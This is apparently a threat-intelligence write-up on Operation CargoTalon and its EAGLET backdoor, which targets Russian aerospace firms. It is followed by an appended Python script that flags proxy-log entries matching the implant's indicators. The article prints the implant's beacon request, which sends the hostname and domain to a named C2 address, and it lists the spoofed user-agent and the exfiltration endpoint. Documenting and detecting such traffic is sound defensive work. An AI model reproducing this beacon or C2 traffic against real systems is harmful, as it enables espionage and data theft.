In late June 2025, cybersecurity analysts identified a highly sophisticated cyber espionage campaign, dubbed Operation CargoTalon, targeting Russia’s aerospace and defense sectors. This operation employs meticulously crafted spear-phishing attacks to infiltrate systems and deploy a custom-built backdoor known as the EAGLET implant.
Targeted Entities and Attack Methodology
The primary focus of Operation CargoTalon is the Voronezh Aircraft Production Association (VASO), a significant player in Russia’s aircraft manufacturing industry. The attackers demonstrate a deep understanding of Russian industrial operations by leveraging Transport Consignment Note (TTN) documents—critical components in Russian logistics—as lures to deceive targets into executing malicious payloads.
Discovery and Initial Infection Vector
On June 27, 2025, analysts from Seqrite identified the campaign while searching for malicious spear-phishing attachments on threat intelligence platforms. The threat actor, tracked as UNG0901, employs a sophisticated multi-stage attack vector that begins with malicious email files and progresses through LNK file execution to ultimately deploy the EAGLET implant.
The initial infection vector involves a malicious email file named backup-message-10.2.2.20_9045-800282.eml, containing an attachment masquerading as a ZIP file. This attachment, titled Транспортная накладная ТТН№391-44 от_26.06.2025.zip (Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip), is actually a malicious DLL file designed to evade detection through file type masquerading.
EAGLET Implant: Technical Analysis
The EAGLET implant is a custom-built DLL backdoor capable of remote command execution and data exfiltration. Upon execution, the malware establishes persistence by creating a directory called MicrosoftApppStore and then contacts its command and control (C2) server located at 185.225.17.104.
The implant utilizes Windows networking APIs, specifically WinHttpOpen and WinHttpConnect, to establish HTTP sessions while masquerading under the user-agent string MicrosoftAppStore/2001.0. This choice of user-agent appears designed to blend with legitimate Microsoft Store traffic, potentially evading network monitoring solutions that might overlook seemingly benign application store communications.
The malware’s initial beacon follows a structured format that exfiltrates basic system information:
```
GET /poll?id={randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1
Host: 185.225.17.104
```
This communication protocol enables the EAGLET implant to support three primary functions:
1. Remote Shell Access: Allows the execution of arbitrary commands on the infected system.
2. File Download Capabilities: Facilitates the staging of additional payloads.
3. Automatic Exfiltration: Sends command results through HTTP POST requests to the /result endpoint.
Infrastructure and Attribution
Analysis of the implant's infrastructure reveals connections to the Head Mare threat group, suggesting possible resource sharing or operational overlap between these advanced persistent threat actors. The C2 server, 185.225.17.104, is located in Romania under ASN 39798 of MivoCloud SRL. Further investigation uncovered passive DNS records pointing to historical infrastructure previously associated with the TA505 threat group. However, apart from the infrastructural correlations, there is no direct evidence linking Operation CargoTalon to TA505.
Similar Campaigns
Similar campaigns have been identified targeting Russian military sectors through recruitment-themed documents. In these instances, the threat actor used the EAGLET implant connecting to a different C2 server, 188.127.254.44, located in Russia under ASN 56694, belonging to the organization LLC Smart Ape. These campaigns occasionally drop a malicious LNK file that executes the DLL implant and extracts a decoy present inside the implant's overlay section. In some cases, implants with no embedded decoy have been observed.
Conclusion
Operation CargoTalon exemplifies the evolving sophistication of cyber espionage campaigns targeting critical infrastructure. By leveraging industry-specific documents and employing multi-stage infection chains, threat actors can effectively infiltrate and compromise high-value targets.
Organizations within the aerospace and defense sectors must remain vigilant, implementing robust cybersecurity measures to detect and mitigate such advanced threats.
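As an added illustration (not code from the Seqrite report or from the implant), the following Python sketch flags proxy-log entries that match the beacon shape described under EAGLET Implant: Technical Analysis: the MicrosoftAppStore/2001.0 user-agent, a GET to /poll carrying id, hostname and domain parameters, a POST to /result, and the two C2 addresses named in the article. The log line format and the sample entries are constructed for this example and are not real telemetry.

```python
import re
from urllib.parse import parse_qs

# Indicators taken from the article above
EAGLET_USER_AGENT = "MicrosoftAppStore/2001.0"
KNOWN_C2 = {"185.225.17.104", "188.127.254.44"}
BEACON_PARAMS = {"id", "hostname", "domain"}

# Assumed (constructed) proxy-log layout:  client "METHOD url" host=... ua="..."
LOG_LINE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<url>\S+)" host=(?P<host>\S+) ua="(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return the list of EAGLET-like traits found in one log line ([] if none)."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    path, _, query = m["url"].partition("?")
    params = set(parse_qs(query).keys())
    reasons = []
    if m["ua"] == EAGLET_USER_AGENT:           # spoofed store user-agent
        reasons.append("eaglet-user-agent")
    if m["host"] in KNOWN_C2:                  # C2 addresses from the report
        reasons.append("known-c2")
    if m["method"] == "GET" and path == "/poll" and BEACON_PARAMS <= params:
        reasons.append("poll-beacon")          # initial check-in shape
    if m["method"] == "POST" and path == "/result":
        reasons.append("result-exfil")         # command output upload
    return reasons

def scan(lines):
    """Return (line, reasons) for every line matching at least one trait."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.append((line, reasons))
    return hits

# Constructed sample log; the GUID, hosts and the 203.0.113.5 address are made up
SAMPLE_LOG = """\
10.0.0.7 "GET /poll?id=0F7A3C2E-1D4B-4E9A-9B1C-2A3D4E5F6A7B&hostname=WS01&domain=CORP" host=185.225.17.104 ua="MicrosoftAppStore/2001.0"
10.0.0.7 "POST /result" host=185.225.17.104 ua="MicrosoftAppStore/2001.0"
10.0.0.9 "GET /index.html" host=www.example.com ua="Mozilla/5.0"
10.0.0.12 "GET /poll?id=abc&hostname=WS02&domain=CORP" host=203.0.113.5 ua="Mozilla/5.0"
"""

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LOG.splitlines()):
        print(", ".join(reasons), "<-", line)
```

The last sample line shows why the beacon shape is worth matching on its own: it reaches an address not in the report's indicator list and uses a benign user-agent, yet is still flagged.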